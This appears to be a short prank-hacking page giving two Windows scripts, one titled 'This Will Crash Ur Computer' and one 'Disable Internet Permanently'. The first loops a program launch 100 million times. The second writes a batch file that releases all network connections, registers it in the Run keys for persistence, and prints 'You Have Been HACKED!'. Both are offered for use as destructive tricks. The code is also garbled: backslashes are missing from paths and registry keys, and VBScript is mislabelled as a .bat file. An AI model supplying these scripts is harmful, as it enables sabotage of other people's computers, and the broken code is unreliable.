This Will Crash Ur Computer

This Will Crash Ur Computer
This Will Crash Ur Computer
setup1:
win+R
setup2:
type -> Notepad
setup3:
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
PAUSE
setup4:
Save The Above Code in a .bat file

It Only Works With Windows XP

Disable Internet Permanently

Disable Internet Permanently

Disable Internet Permanently

setup1:
win+R
setup2:
type -> Notepad
setup3:
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
setup4:
Save The Above Code in a .bat file